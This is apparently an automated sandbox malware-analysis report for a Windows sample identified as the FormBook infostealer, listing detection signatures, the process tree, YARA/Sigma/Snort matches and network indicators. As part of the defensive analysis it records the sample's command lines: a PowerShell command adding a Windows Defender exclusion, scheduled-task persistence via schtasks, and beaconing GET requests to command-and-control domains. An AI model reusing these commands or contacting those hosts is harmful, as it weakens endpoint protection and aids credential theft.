Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jlsvOH1c8bSRKqM.exe

Overview

General Information

Sample name:jlsvOH1c8bSRKqM.exe
Analysis ID:1468932
MD5:5cb7acef6fcb2f9feed94483f364030a
SHA1:68470b83c29c96c569ed5db44668fe6286c1230c
SHA256:c6af34274ba09e990bdbc008c74f95f935ba6d256ed23ee8c67ea06530c8c0ea
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jlsvOH1c8bSRKqM.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7532 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jlsvOH1c8bSRKqM.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
      • DAGiwzvTYsMjq.exe (PID: 4956 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • reg.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • DAGiwzvTYsMjq.exe (PID: 5764 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • AZJifQrhDpEQCA.exe (PID: 7752 cmdline: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • schtasks.exe (PID: 7976 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AZJifQrhDpEQCA.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • AZJifQrhDpEQCA.exe (PID: 8028 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
    • AZJifQrhDpEQCA.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe" MD5: 5CB7ACEF6FCB2F9FEED94483F364030A)
      • DAGiwzvTYsMjq.exe (PID: 6008 cmdline: "C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • reg.exe (PID: 5216 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2adc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x38086:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x21605:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d533:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16ab2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x178b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ProcessId: 7452, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ProcessId: 7452, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe, ParentImage: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe, ParentProcessId: 7752, ParentProcessName: AZJifQrhDpEQCA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp", ProcessId: 7976, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", ProcessId: 7532, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ProcessId: 7452, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe", ParentImage: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe, ParentProcessId: 7268, ParentProcessName: jlsvOH1c8bSRKqM.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp", ProcessId: 7532, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:07/08/24-09:33:28.821901
            SID:2855465
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeVirustotal: Detection: 31%Perma Link
            Multi AV Scanner detection for submitted file
            Source: jlsvOH1c8bSRKqM.exeReversingLabs: Detection: 34%
            Source: jlsvOH1c8bSRKqM.exeVirustotal: Detection: 31%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: jlsvOH1c8bSRKqM.exeJoe Sandbox ML: detected
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ZxNe.pdb source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DAGiwzvTYsMjq.exe, 00000010.00000000.1786583208.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128994331.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4128729232.0000000000EFE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jlsvOH1c8bSRKqM.exe, jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000011.00000003.1861195873.0000000003182000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000011.00000003.1863498773.0000000003371000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.000000000317E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000002.1967179845.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1962025631.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000014.00000003.1960067886.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdb source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: reg.pdbGCTL source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 0000000F.00000002.1960190592.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000003.1799312024.0000000000FDB000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000002.4128948551.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000003.1898624994.0000000000B5B000.00000004.00000001.00020000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000002.4128613079.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZxNe.pdbSHA256+ source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.dr
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CEC070 FindFirstFileW,FindNextFileW,FindClose,17_2_02CEC070
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 4x nop then jmp 0706135Ch0_2_070614DA
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 4x nop then jmp 070F0554h9_2_070F06D2
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 4x nop then jmp 070F0554h9_2_070F0828
            Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then xor eax, eax17_2_02CD9780
            Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then pop edi17_2_02CE259D
            Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then mov ebx, 00000004h17_2_03420548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 3.33.130.190:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.soutsour.xyz
            Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
            Source: Joe Sandbox ViewIP Address: 203.161.41.207 203.161.41.207
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.angrytee.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v6z4/?gNl=v5OlzSyVHRQHkR8SzJ3gVKTFGeiNQ9a3rPHOxN5wltqCxit6zhqg4pXFuWsKngfZsZtYBOZhxp3bwCRN51e7LBPhb0MuJX9gMhQmuGphOmN3xULrqSpMXE0=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.orthonow.liveUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.boutiqueinaboxshop.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.lmsforsme.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.fundraiserstuffies.comUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.soutsour.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
